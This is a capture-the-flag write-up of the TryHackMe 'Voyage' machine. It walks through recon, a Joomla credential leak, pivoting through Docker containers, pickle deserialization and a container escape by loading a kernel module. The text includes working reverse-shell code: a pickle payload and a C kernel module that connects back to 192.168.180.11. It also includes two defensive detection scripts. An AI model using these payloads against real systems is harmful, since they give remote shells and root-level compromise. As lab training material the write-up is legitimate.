[THM] Voyage

Published:

Word count:
2.2k


Information Gathering

As usual, start with information gathering. Only three ports are open: two of them are SSH services and one is an HTTP service.

```
nmap -sV -sC -v 10.48.150.165
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-04 01:35 EST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 01:35
Completed NSE at 01:35, 0.00s elapsed
Initiating NSE at 01:35
Completed NSE at 01:35, 0.00s elapsed
Initiating NSE at 01:35
Completed NSE at 01:35, 0.00s elapsed
Initiating Ping Scan at 01:35
Scanning 10.48.150.165 [4 ports]
Completed Ping Scan at 01:35, 0.19s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:35
Completed Parallel DNS resolution of 1 host. at 01:35, 0.02s elapsed
Initiating SYN Stealth Scan at 01:35
Scanning 10.48.150.165 [1000 ports]
Discovered open port 22/tcp on 10.48.150.165
Discovered open port 80/tcp on 10.48.150.165
Discovered open port 2222/tcp on 10.48.150.165
Discovered open port 2222/tcp on 10.48.150.165
Completed SYN Stealth Scan at 01:35, 6.11s elapsed (1000 total ports)
Initiating Service scan at 01:35
Scanning 3 services on 10.48.150.165
Completed Service scan at 01:35, 9.70s elapsed (3 services on 1 host)
NSE: Script scanning 10.48.150.165.
Initiating NSE at 01:35
Completed NSE at 01:36, 11.10s elapsed
Initiating NSE at 01:36
Completed NSE at 01:36, 0.73s elapsed
Initiating NSE at 01:36
Completed NSE at 01:36, 0.00s elapsed
Nmap scan report for 10.48.150.165
Host is up (0.16s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 65:ae:f2:a0:03:5d:04:89:7f:a8:7b:22:b3:4c:5c:15 (ECDSA)
|_ 256 ce:a0:87:b9:bc:d0:03:49:5a:c4:2f:70:5d:4b:f3:49 (ED25519)
80/tcp open http Apache httpd 2.4.58 ((Ubuntu))
| http-robots.txt: 16 disallowed entries (15 shown)
| /joomla/administrator/ /administrator/ /api/ /bin/
| /cache/ /cli/ /components/ /includes/ /installation/
|_/language/ /layouts/ /libraries/ /logs/ /modules/ /plugins/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 1B6942E22443109DAEA739524AB74123
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.58 (Ubuntu)
2222/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ad:4a:7e:34:01:09:f8:68:d8:f7:dd:b8:57:d4:17:cf (RSA)
| 256 8d:cd:5e:60:35:c8:65:66:3a:c5:5c:2f:ac:62:93:80 (ECDSA)
|_ 256 a9:d5:16:b1:5d:4a:4c:94:3f:fd:a9:68:5f:24:ee:79 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 01:36
Completed NSE at 01:36, 0.00s elapsed
Initiating NSE at 01:36
Completed NSE at 01:36, 0.00s elapsed
Initiating NSE at 01:36
Completed NSE at 01:36, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.20 seconds
Raw packets sent: 1263 (55.548KB) | Rcvd: 1069 (42.780KB)
```

The HTTP service is naturally the main focus next. Opening it directly, index.html does not reveal much, so I ran dirsearch to brute-force directories for more information. One of the results, an administrator directory, gave a hint that the site runs the Joomla CMS, but looking around I could not find any version information, so I decided to scan the site with the nmap http-enum script to see whether it could find the version.

This identifies the target version as 4.2.7.

```
nmap -p 80 --script http-enum 10.48.150.165 
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-04 01:56 EST
Nmap scan report for 10.48.150.165
Host is up (0.16s latency).

PORT STATE SERVICE
80/tcp open http
| http-enum:
| /administrator/: Possible admin folder
| /administrator/index.php: Possible admin folder
| /robots.txt: Robots file
| /administrator/manifests/files/joomla.xml: Joomla version 4.2.7
| /htaccess.txt: Joomla!
| /README.txt: Interesting, a readme.
| /cache/: Potentially interesting folder
| /images/: Potentially interesting folder
| /includes/: Potentially interesting folder
| /modules/: Potentially interesting folder
| /templates/: Potentially interesting folder
|_ /tmp/: Potentially interesting folder

Nmap done: 1 IP address (1 host up) scanned in 31.66 seconds
```

Next, searching the browser for Joomla 4.2.7 CVEs turned up a Python exploit script for a CVE that roughly matches this version.

The output leaks the root user's password.

I first tried logging in on the HTTP login page, which did not work. Then I remembered the SSH services on ports 22 and 2222, where the password could also be tried, and sure enough it logged in successfully to the SSH service on port 2222.

Getting the User Flag

There was no user.txt to be found locally, so I ran LinEnum.sh to enumerate privilege escalation leads, but without much to show for it. In the / root directory there is a .docker file, which shows this is a Docker container (this was also my first time dealing with a Docker machine, so from this point on I mostly followed other people's write-ups and worked through the box bit by bit).

Looking at the local .bash_history shows that nmap is available. After checking my own subnet with ip a, I scanned the subnet with nmap.

```
root@f5eb774507f2:/tmp# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
8: eth0@if9: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:c0:a8:64:0a brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 192.168.100.10/24 brd 192.168.100.255 scope global eth0
valid_lft forever preferred_lft forever
root@f5eb774507f2:/tmp# nmap 192.168.100.0/24
Starting Nmap 7.80 ( https://nmap.org ) at 2026-02-04 07:29 UTC
Nmap scan report for ip-192-168-100-1.ap-south-1.compute.internal (192.168.100.1)
Host is up (0.0000050s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
2222/tcp open EtherNetIP-1
5000/tcp open upnp
MAC Address: 02:42:CC:06:07:52 (Unknown)

Nmap scan report for voyage_priv2.joomla-net (192.168.100.12)
Host is up (0.0000060s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
5000/tcp open upnp
MAC Address: 02:42:C0:A8:64:0C (Unknown)

Nmap scan report for f5eb774507f2 (192.168.100.10)
Host is up (0.0000040s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
22/tcp open ssh

Nmap done: 256 IP addresses (3 hosts up) scanned in 2.62 seconds
```

This finds a host at 192.168.100.12 with port 5000 open, so the next step is to forward that port to the local machine in order to access it.

```
ssh -CfNg -L 16666:192.168.100.12:5000 root@10.48.150.165 -p 2222
```

Opening localhost:16666 in the local browser shows a login page. I had intended to test it first and then try brute-forcing, but admin with an arbitrary password got straight in.

Again I used dirsearch to look for directories, but in the end it only found a console directory.


Capturing the traffic with Burp Suite shows that the server sets a cookie. At first I had no idea what the cookie was; after asking an AI, it turned out to be hex-encoded, and the leading \x80\x04 identifies it as a pickle, so the issue is pickle deserialization.
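The defender's side of the same observation, as an added example that is not part of the original write-up: decode the hex cookie, confirm the pickle PROTO header the text mentions, walk the opcode stream with pickletools without executing anything, and show an unpickler that refuses every class lookup so only plain data can load. The sample cookies are constructed here, not taken from the target.

```python
#!/usr/bin/env python3
"""Inspect a hex-encoded cookie for a pickle payload without executing it."""
import datetime
import io
import pickle
import pickletools

# Opcodes that let a pickle import modules or call callables during loads().
CODE_OPCODES = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ",
                "NEWOBJ", "NEWOBJ_EX", "BUILD"}


def looks_like_pickle(raw: bytes) -> bool:
    """Protocol 2+ pickles start with PROTO (0x80) followed by the version byte."""
    return len(raw) >= 2 and raw[0] == 0x80 and 2 <= raw[1] <= 5


def dangerous_opcodes(raw: bytes) -> list:
    """Static scan: walks the opcode stream with pickletools, runs nothing."""
    return [op.name for op, _arg, _pos in pickletools.genops(raw)
            if op.name in CODE_OPCODES]


class NoImportUnpickler(pickle.Unpickler):
    """Refuses every class/function lookup, so only plain data can load."""
    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"refusing to import {module}.{name}")


def inspect_cookie(cookie_hex: str) -> dict:
    report = {"is_pickle": False, "dangerous": [], "loaded": None}
    try:
        raw = bytes.fromhex(cookie_hex)
    except ValueError:            # not hex at all, so not the format seen here
        return report
    if not looks_like_pickle(raw):
        return report
    report["is_pickle"] = True
    report["dangerous"] = dangerous_opcodes(raw)
    try:
        report["loaded"] = NoImportUnpickler(io.BytesIO(raw)).load()
    except pickle.UnpicklingError:  # any object needing an import is rejected
        report["loaded"] = None
    return report


# Constructed samples: a plain session dict, and a benign object that still
# needs a class lookup plus REDUCE to rebuild (the same opcodes an exploit uses).
SAFE_COOKIE = pickle.dumps({"user": "admin"}, protocol=4).hex()
REDUCE_COOKIE = pickle.dumps(datetime.date(2026, 2, 4), protocol=4).hex()
```

Anything whose scan shows STACK_GLOBAL or REDUCE should never reach a plain pickle.loads on the server; signing the cookie or switching to JSON removes the problem entirely.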

I tried payloads generated by several other Python scripts, but of the several I found, only this one successfully returned a reverse shell.

```python
#!/usr/bin/env python3
import pickle
import subprocess


class Exploit:
    # pickle calls this on load and runs the returned callable with the args
    def __reduce__(self):
        return (subprocess.Popen, (["bash", "-c", "bash -i >& /dev/tcp/192.168.180.11/4447 0>&1"],))


payload = pickle.dumps(Exploit())
# hex-encode to match the cookie format the server uses
print(payload.hex())
```

Listening on local port 4447 then yields a shell.

Next, the shell needs to be upgraded to a TTY.

```bash
# run in the reverse shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# press Ctrl+Z to return to the host, then:
stty raw -echo; fg
```

This terminal is more stable and the arrow keys work. We can then obtain user.txt, the first flag, in this container.

Root Flag

I learned that the next step is a container escape. The CDK tool is used here to enumerate information.

It finds that the container has the cap_sys_module capability, which allows loading kernel modules. Since the kernel is shared between the container and the host, loading a malicious kernel module achieves the Docker escape.
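The check a container audit would run for the condition just described, as an added example that is not part of the original write-up or of CDK: decode the CapEff mask from /proc/self/status and report capabilities, CAP_SYS_MODULE in particular, that Docker's default profile does not grant. The two status texts are constructed; the second adds CAP_SYS_MODULE (bit 16) to the default set and is an assumption about this box, not its real mask.

```python
#!/usr/bin/env python3
"""Decode CapEff from /proc/<pid>/status and flag escape-relevant capabilities."""

# Bit numbers from capability(7); only the capabilities that let a process
# reach the shared kernel or the host are listed here.
RISKY_CAPS = {
    "CAP_DAC_READ_SEARCH": 2,
    "CAP_NET_ADMIN": 12,
    "CAP_SYS_MODULE": 16,      # insmod/finit_module against the host kernel
    "CAP_SYS_RAWIO": 17,
    "CAP_SYS_PTRACE": 19,
    "CAP_SYS_ADMIN": 21,
}

# Docker's default effective set (CapEff: 00000000a80425fb) contains none of them.
DOCKER_DEFAULT_CAPEFF = 0x00000000A80425FB


def parse_capeff(status_text: str) -> int:
    """Return the effective capability mask from /proc/self/status text."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return int(line.split(":", 1)[1].strip(), 16)
    raise ValueError("no CapEff line found")


def risky_caps(mask: int) -> list:
    return [name for name, bit in RISKY_CAPS.items() if (mask >> bit) & 1]


def extra_over_docker_default(mask: int) -> list:
    """Risky capabilities present that the default Docker profile would not grant."""
    extra = mask & ~DOCKER_DEFAULT_CAPEFF
    return [name for name, bit in RISKY_CAPS.items() if (extra >> bit) & 1]


def check_status(status_text: str) -> dict:
    mask = parse_capeff(status_text)
    return {
        "mask": mask,
        "risky": risky_caps(mask),
        "extra": extra_over_docker_default(mask),
        "can_load_modules": bool((mask >> RISKY_CAPS["CAP_SYS_MODULE"]) & 1),
    }


# Constructed samples: the Docker default, and the default plus bit 16.
DEFAULT_STATUS = "Name:\tbash\nCapEff:\t00000000a80425fb\n"
SYS_MODULE_STATUS = "Name:\tbash\nCapEff:\t00000000a80525fb\n"

if __name__ == "__main__":
    with open("/proc/self/status") as f:   # run inside the container to audit it
        print(check_status(f.read()))
```

A container that shows can_load_modules true should be run without --cap-add SYS_MODULE (or --privileged); the default profile already drops it.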

First, prepare a shell.c file.

```c
#include <linux/init.h>
#include <linux/module.h>
#include <linux/kmod.h>

MODULE_LICENSE("GPL");

/* Ask the kernel to spawn a user-space process from module context. */
static int shell(void)
{
    char *argv[] = {"/bin/bash", "-c", "bash -i >& /dev/tcp/192.168.180.11/7970 0>&1", NULL};
    static char *env[] = {
        "HOME=/",
        "TERM=linux",
        "PATH=/sbin:/bin:/usr/sbin:/usr/bin", NULL };
    return call_usermodehelper(argv[0], argv, env, UMH_WAIT_PROC);
}

/* Runs once when the module is loaded with insmod. */
static int init_mod(void)
{
    return shell();
}

static void exit_mod(void)
{
    return;
}

module_init(init_mod);
module_exit(exit_mod);
```

Then prepare a Makefile to compile it. I tried the dynamic form make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules, but make did not seem to build successfully on the machine.

In the end I checked the target's kernel version with uname -r and set it manually.

```makefile
obj-m += shell.o
all:
	make -C /lib/modules/6.8.0-1030-aws/build M=$(PWD) modules
clean:
	make -C /lib/modules/6.8.0-1030-aws/build M=$(PWD) clean
```

After copying everything to the machine and running make successfully, many extra files appear in the directory.

First open a listener locally, ready to receive the shell; loading the malicious module is then just insmod shell.ko.

After that, the final root.txt flag can be obtained.

Summary

Many things on this machine were a first for me. For the pickle deserialization on the second Docker container, the exploit code came entirely from other people's write-ups; I had only studied pickle deserialization in theory before, and when I actually ran into it I was still lost. Still, I learned a lot, getting hands-on with Docker escapes and pickle deserialization, and I hope that next time I meet them I can solve them on my own with a deeper understanding.